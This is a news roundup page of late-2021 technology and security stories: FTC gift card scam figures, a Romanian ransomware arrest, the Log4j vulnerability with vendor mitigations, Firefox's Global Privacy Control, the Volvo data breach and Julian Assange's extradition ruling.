Information Technology

The Federal Trade Commission’s (FTC’s) latest “data spotlight” release shows $148 million in gift card payment scams have been recorded for the first nine months of 2021. This growing trend exceeds the total number and dollar amount of similar scams logged by the agency throughout the entirety of 2020. This type of scam involves a malicious party convincing the target that they are required to provide some form or payment to settle a debt. The grift usually comes with threats of legal action, wage garnishment, or jail time, should they not comply with the request of the fictitious company or government agency the caller claims to be representing. Also: Log4j zero-day flaw: What you need to know and how to protect yourselfIn reality, these criminal actions are a way for unscrupulous individuals or criminal rings to secure gift card codes they can use illicitly or resell through online black markets for profit. The data spotlight shows more than 40,000 consumers were impacted by these scams during the first three quarters of 2021, with the practice peaking at $51 million and 14,000 reports during Q1 alone. Median losses for each of the incidents rose as well, from $700 in 2018 to $1,000 in 2021. Much larger thefts of $5,000 or more resulting from gift card scams also now represent more than 8% of reports, showing these thieves are becoming more brazen. The most popular gift card to request among scammers, by far, is one for Target stores. These represented $35 million in scam sales between January and September 2021. Google Play was a distant second at $17 million, followed by Apple ($16 million), eBay ($10 million), and Walmart ($6 million). Interestingly, even if the caller was directed to purchase a gift card for another retailer, Target was the most popular store to suggest victims use for their purchase. Walmart, Best Buy, CVS, and Walgreens were all also popular with scammers, the FTC said. 

If all of these facts weren’t unsettling enough, the agency noted that some scammers even groom their victims to avoid detection. The FTC has evidence of criminals instructing victims to visit multiple stores to avoid suspicion by making several smaller purchases, with some even providing coaching on what to tell cashiers that ask questions about their orders. The FTC once again urged consumers to immediately hang up on any caller that claims to be attempting to collect a debt via gift card. Just in case it needs to be said again, no government agency or commercial entity of any kind will actually attempt to collect a debt from you via gift card, ever. The Federal Trade Commission suggests that anyone that believes they may have been targeted by a scammer visit its informational site on gift card scams while also reporting the incident to its fraud division.  More

Europol’s European Cybercrime Centre has worked with the Romanian National Police and FBI on the arrest of a suspected ransomware affiliate who is alleged to have targeted high-profile organisations and companies for their sensitive data. Europol said a 41-year old Romanian man has been arrested in Craiova, Romania. It said the man is suspected of compromising the network of a large Romanian IT company which delivers services to clients in the retail, energy and utilities sectors.The suspect is accused of targeting organisations in ransomware attacks, encrypting files and stealing sensitive data. He’s suspected of demanding a “sizeable” ransom payment in cryptocurrency, threatening to leak the stolen data if the victim didn’t give into the extortion attempt.SEE: A winning strategy for cybersecurity (ZDNet special report)The attacker stole information included financial information about the company, personal information about employees, customer details and other sensitive details and attempted to blackmail the victim into paying a ransom with a threat to publish the data. It wasn’t revealed if this attempt at extortion was successful or not. Europol supported the investigation by tracing cryptocurrency payments, providing malware analysis and forensic support and deploying experts to Romania.The arrest is the latest in a string of arrests by the Romanian authorities, which last month arrested two individuals suspected of involvement in Sodinokibi/REvil ransomware attacks. 

A recent report by Europol warned that ransomware attacks are getting more sophisticated as cyber criminals look towards new tactics and techniques to maximise the chances of successfully receiving a ransom payment, something which regularly costs victims millions of dollars.”Perpetrators continue to be increasingly ruthless and methodical in their modi operandi,” said the report.  MORE ON CYBERSECURITY More

A flaw in Log4j, a Java library for logging error messages in applications, is the most high-profile security vulnerability on the internet right now and comes with a severity score of 10 out of 10.  The library is developed by the open-source Apache Software Foundation and is a key Java-logging framework. Since last week’s alert by CERT New Zealand that CVE-2021-44228, a remote code execution flaw in Log4j, was already being exploited in the wild, warnings have been issued by several national cybersecurity agencies, including the Cybersecurity and Infrastructure Security Agency (CISA) and the UK’s National Cyber Security Centre (NCSC). Internet infrastructure provider Cloudflare said Log4j exploits started on December 1.   What devices and applications are at risk?  Basically any device that’s exposed to the internet is at risk if it’s running Apache Log4J, versions 2.0 to 2.14.1. NCSC notes that Log4j version 2 (Log4j2), the affected version, is included in Apache Struts2, Solr, Druid, Flink, and Swift frameworks.   Mirai, a botnet that targets all manner of internet-connected (IoT) devices, has adopted an exploit for the flaw. Cisco and VMware have released patches for their affected products respectively.  Log4j flaw coverage – what you need to know now AWS has detailed how the flaw impacts its services and said it is working on patching its services that use Log4j and has released mitigations for services like CloudFront.      Likewise, IBM said it is “actively responding” to the Log4j vulnerability across IBM’s own infrastructure and its products. IBM has confirmed Websphere 8.5 and 9.0 are vulnerable.  Oracle has issued a patch for the flaw, too. 

“Due to the severity of this vulnerability and the publication of exploit code on various sites, Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible,” it said.  Necessary actions: Device discovery and patching CISA’s main advice is to identify internet-facing devices running Log4j and upgrade them to version 2.15.0, or to apply the mitigations provided by vendors “immediately”. But it also recommends setting up alerts for probes or attacks on devices running Log4j.   “To be clear, this vulnerability poses a severe risk,” CISA director Jen Easterly said Sunday. “We will only minimize potential impacts through collaborative efforts between government and the private sector. We urge all organizations to join us in this essential effort and take action.”   Additional steps recommended by CISA include: enumerating any external facing devices with Log4j installed; ensuring the security operations center actions every alert with Log4j installed; and installing a web application firewall (WAF) with rules to focus on Log4j. 

AWS has updated its WAF rule set – AWSManagedRulesKnownBadInputsRuleSet AMR – to detect and mitigate Log4j attack attempts and scanning. It also has mitigation options that can be enabled for CloudFront, Application Load Balancer (ALB), API Gateway, and AppSync. It’s also currently updating all Amazon OpenSearch Service to the patched version of Log4j.  SEE: A winning strategy for cybersecurity (ZDNet special report) NCSC recommends updating to version 2.15.0 or later, and – where not possible – mitigating the flaw in Log4j 2.10 and later by setting system property “log4j2.formatMsgNoLookups” to “true” or removing the JndiLookup class from the classpath.  Part of the challenge will be identifying software harboring the Log4j vulnerability. The Netherland’s Nationaal Cyber Security Centrum (NCSC) has posted a comprehensive and sourced A-Z list on GitHub of all affected products it is aware are either vulnerable, not vulnerable, are under investigation, or where a fix is available. The list of products illustrates how widespread the vulnerability is, spanning cloud services, developer services, security devices, mapping services, and more.     Vendors with popular products known to be still vulnerable include Atlassian, Amazon, Microsoft Azure, Cisco, Commvault, ESRI, Exact, Fortinet, JetBrains, Nelson, Nutanix, OpenMRS, Oracle, Red Hat, Splunk, Soft, and VMware. The list is even longer when adding products where a patch has been released.     NCCGroup has posted several network-detection rules to detect exploitation attempts and indicators of successful exploitation. Finally, Microsoft has released its set of indicators of compromise and guidance for preventing attacks on Log4j vulnerability. Examples of the post-exploitation of the flaw that Microsoft has seen include installing coin miners, Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems.   More

Cyber attackers are making over a hundred attempts to exploit a critical security vulnerability in Java logging library Apache Log4j every minute, security researchers have warned. The Log4j flaw (also now known as “Log4Shell”) is a zero-day vulnerability (CVE-2021-44228) that first came to light on December 9, with warnings that it can allow unauthenticated remote code execution and access to servers. Log4j is used in many forms of enterprise and open-source software, including cloud platforms, web applications and email services, meaning that there’s a wide range of software that could be at risk from attempts to exploit the vulnerability. Log4j flaw coverage – what you need to know now Attackers are already attempting to scan the internet for vulnerable instances of Log4j, with cybersecurity researchers at Check Point warning that there are over 100 attempts to exploit the vulnerability every minute. Meanwhile, cybersecurity researchers at Sophos have warned that they’ve detected hundreds of thousands of attempts to remotely execute code using the Log4j vulnerability in the days since it was publicly disclosed, along with scans searching for the vulnerability. There are already active examples of attackers attempting to leverage Log4j vulnerabilities to install cryptocurrency-mining malware, while there also reports of several botnets, including Mirai, Tsunami, and Kinsing, that are making attempts to leverage it. Researchers at Microsoft have also warned about attacks attempting to take advantage of Log4j vulnerabilities, including a range of cryptomining malware, as well as active attempts to install Cobalt Strike on vulnerable systems, something that could allow attackers to steal usernames and passwords.

It’s common for cyber criminals to make efforts to exploit newly disclosed vulnerabilities in order to have the best chance of taking advantage of them before they’re remediated – but in this case, the ubiquity of Log4j and the way many organisations may be unaware that it’s part of their network, means there could be a much larger window for attempts to scan for access. And while cyber criminals attempting to leverage Log4j vulnerabilities to install cryptomining malware might initially appear to be a relatively low level threat, it’s likely that higher level, more dangerous cyber attackers will attempt to follow.

ZDNet Recommends

“I cannot overstate the seriousness of this threat. On the face of it, this is aimed at cryptominers but we believe this creates just the sort of background noise that serious threat actors will try to exploit in order to attack a whole range of high-value targets such as banks, state security and critical infrastructure,” said Lotem Finkelstein, director of threat intelligence and research for Check Point. SEE: A winning strategy for cybersecurity (ZDNet special report) The severity of the vulnerability in such a widely used library means that organisations and technology vendors are being urged to counter the threat as soon as possible. “In the case of this vulnerability CVE-2021-44228, the most important aspect is to install the latest updates as soon as practicable,” said an alert by the UK’s National Cyber Security Centre (NCSC). While the Log4j security issue only recently came to light, evidence suggests that attackers have been exploiting the vulnerability for some time before it was publicly disclosed.
MORE ON CYBERSECURITY More

Image: Kevin Beaumont
The usage of the nasty vulnerability in the Java logging library Apache Log4j that allowed unauthenticated remote code execution could have kicked off as early as December 1.”Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC,” Cloudflare CEO Matthew Prince said on Twitter. “That suggests it was in the wild at least 9 days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure.” Cisco Talos said in a blog post that it observed activity for the vulnerability known as CVE-2021-44228 from December 2, and those looking for indicators of compromise should extend their searches to at least that far back. Thanks to the ubiquity of the impacted library, Talos said it was seeing lead time from attackers doing mass scanning to callbacks occurring, and could be due to vulnerable but non-targeted systems — such as SIEMs and log collectors — being triggered by the exploit. It added that the Mirai botnet was starting to use the vulnerability. Researchers at Netlab 360 said they had seen the Log4j vulnerability used to create Muhstik and Mirai botnets that went after Linux devices. Over the weekend, vendors have been rushing to get patches out and document workarounds for affected products. The end results have been product matrices such as those from VMware and Cisco where some products have patches available, some have workarounds, and others remain vulnerable. Both vendors scored CVE-2021-44228 as a perfect 10.

The suggested workarounds typically either set the log4j2.formatMsgNoLookups flag to true, or remove the JndiLookup class from the classpath used by Java. A Reddit post from NCC Group is being regularly updated, and shows how the exploit can be used to exfiltrate AWS secrets, as well as all manner of Java system properties. One security researcher was able to trigger the exploit by going Little Bobby Tables on his iPhone name. Sophos said it was seeing the vulnerability already being used by cryptominers. On the more enjoyable front, a Minecraft mod developer was able to use the vulnerability to turn a Minecraft server into one that played Doom instead. “For some context, this is an entirely vanilla client connecting to a modded server, which, through this exploit, is sending over and executing the code to run doom,” Gegy said. Microsoft threat analyst Kevin Beaumont said defence in depth was “probably your best option”. “To give a spoiler for Log4Shell, this is going to take weeks to play out to establish attack surface (it is large) and then maybe a month or more for patches to be made available,” he said. Related Coverage More

Mozilla has expanded its implementation of Global Privacy Control (GPC) to all users after rolling it out on a limited basis in October. The feature – which tells websites not to sell or share your personal data – was only available in Firefox Nightly, their pre-release channel. But as of this week, GPC will be available for all Firefox users to turn on if they wish to. Unfortunately for most US users, this feature may not have much effect. The GPC is required under the California Consumer Protection Act (CCPA) and Europe’s Global Data Protection Regulation (GDPR) as well as Colorado’s privacy law, but no other states have laws that will enforce it.Even California and Colorado have faced backlash for loopholes in their laws that make it difficult to actually enforce the feature. Mozilla told ZDNet that GPC complements technical anti-tracking features integrated into Firefox, like Enhanced Tracking Protection and Total Cookie Protection. “By sending a signal to the websites that people visit, telling them that the person does not want to be tracked and does not want their data to be sold, it helps address the tracking conducted by websites through first-party cookies,” Mozilla said in a statement. “We think it can play an integral role in making a right to opt-out meaningful and easy to use for consumers. GPC is getting traction both in California and in Colorado. Now that we expect websites to start honoring GPC, we want to start providing this option to Firefox users. Yet, the rules around the enforceability of GPC under the CCPA remain ambiguous and leave space for businesses to ignore the signal sent by the browser on behalf of consumers.” 

The company noted that last month, they shared feedback with the California Privacy Protection Agency, encouraging the California AG and other privacy agencies globally to expressly require businesses to comply with GPC.Jennifer Hodges, Mozilla’s head of US public policy, said the GPC signal is sent by Firefox to websites regardless of the state the user is in. “However, the GPC may not be enforceable in jurisdictions without privacy legislation that include do not sell provisions which allow for the GPC signal to act as a universal opt-out,” Hodges explained.”For someone in a state that does not have a privacy law, The GPC may not be enforceable. California and Colorado are two states that have GPC-like provisions at the moment.”Hodges said history has shown that without a clear legal mandate, most businesses will not comply with consumer opt-out signals sent through browsers. “This vacuum is the same reason that Do Not Track (“DNT”) failed to gain adoption. It was eventually removed by all major browsers because it created a false sense of consumer protection that could not be enforced,” Hodges added.  “The 2023 Colorado Privacy Law has taken this step, and the addition of California would pave the path for other global privacy regulators to similarly update their laws. In addition, we think that enforcement authorities should also expect businesses to interpret the GPC as governing both the direct sale of consumer’s information as well as the sharing of consumers’ information for programmatic advertising targeting purposes. Regulators, consistent with the intent of CCPA and CPRA, must step in to give tools like the GPC enforcement teeth and to ensure consumers’ choices are honored.” More

Volvo Cars has released a statement confirming a breach of sensitive files that resulted from a cyberattack.Volvo said it is now aware that “one of its file repositories has been illegally accessed by a third party.””Investigations so far confirm that a limited amount of the company’s R&D property has been stolen during the intrusion. Volvo Cars has earlier today concluded, based on information available, that there may be an impact on the company’s operation,” Volvo said in a statement. “After detecting the unauthorised access, the company immediately implemented security countermeasures including steps to prevent further access to its property and notified relevant authorities.” Volvo added that it is still in the process of investigating the incident and has hired a cybersecurity firm to help “investigate the property theft.” The attack did not have “an impact on the safety or security of its customers’ cars or their personal data,” the company noted in their statement. But they conditioned the statement by saying this was only based on their “currently available information.”Bleeping Computer reported that the Snatch ransomware group has claimed responsibility for the attack after adding the company to its leak site on November 30. The group already published a small portion of the documents they stole on their leak site. 

According to Sophos, the group has been active since 2018 and gained notoriety in 2019 for a novel trick where they were able to bypass antivirus software by rebooting an infected computer into Safe Mode and running the ransomware’s file encryption process from there.The group became known for buying access into victim networks and lurking for days and weeks, expanding their foothold in a company before initiating the ransomware process. The group also became well known as a ransomware gang that engaged in data theft in addition to encrypting victim networks. Erich Kron, security awareness advocate at KnowBe4, said most ransomware is spread through phishing emails or through exploiting RDP instances open to the internet, noting that this was a hallmark of Snatch. “The Snatch gang makes great use of RDP in infection and lateral movement within an organization. To defend against these attacks, organizations are wise to ensure employees are trained on the importance of using complex passwords and not reusing passwords with other accounts. Organizations should also be on high alert for brute force attempts against RDP,” Kron said.  More

A UK High Court has approved the extradition of WikiLeaks founder Julian Assange to the US. 

ZDNet Recommends

Assange has been wanted by US authorities since the early 2010s for his role in acquiring and disseminating military and diplomatic documents via the WikiLeaks website. Following a long stint at Ecuador’s embassy in London, he was finally arrested in 2019, when his asylum was revoked. He has been indicted on 18 criminal counts, including 17 espionage charges. The collective maximum sentence for all charges comes to 175 years, but the US government has indicated that the actual imprisonment would be far, far shorter. This decision follows an earlier ruling made in January 2021, which denied the US request based on the court’s perception that it posed too great a risk to Assange’s wellbeing. The judge forbade the extradition due to “a recurrent depressive disorder which was severe in December 2019 and sometimes accompanied by psychotic features (hallucinations), often with ruminative suicidal ideas.” The new ruling takes concerns over Assange’s mental health into account, but it also integrates a series of four “assurances” made by US officials. These include: a promise that Assange will never be held under any “special administrative measures”; a commitment to never house him within a maximum security prison; a guarantee that he will be allowed to serve his final sentence in his native Australia, if he wishes; and a commitment to provide him with “appropriate clinical and psychological treatment as recommended by a qualified treating clinician at the prison where he is held.” Assange’s fiancée, Stella Morris, was outraged by the decision, telling the UK’s Sky News that his legal counsel intended to appeal the decision “at the earliest possible moment.” She called the repeal a “grave miscarriage of justice,” asking how the UK could allow him to be sent to a country that “plotted to kill him.” This final accusation likely relates to reporting from earlier this year, which claims that the Trump administration explored the possibility of forcibly kidnapping or assassinating Assange in 2017. The US government has never officially commented on this report. Assange remains a controversial figure, with organizations like Amnesty International and individuals like Edward Snowden still calling for his release based on concerns over preserving freedom of speech and the arrest’s chilling effect on investigative journalism. The US government, however, has never wavered in its stance that the WikiLeaks founder’s actions were criminal in nature, putting lives at risk by divulging classified information to enemies of the US. 

Assange’s legal team now has 14 days to file their appeal, which will delay any extradition proceedings until that filing is subsequently resolved. 

Government More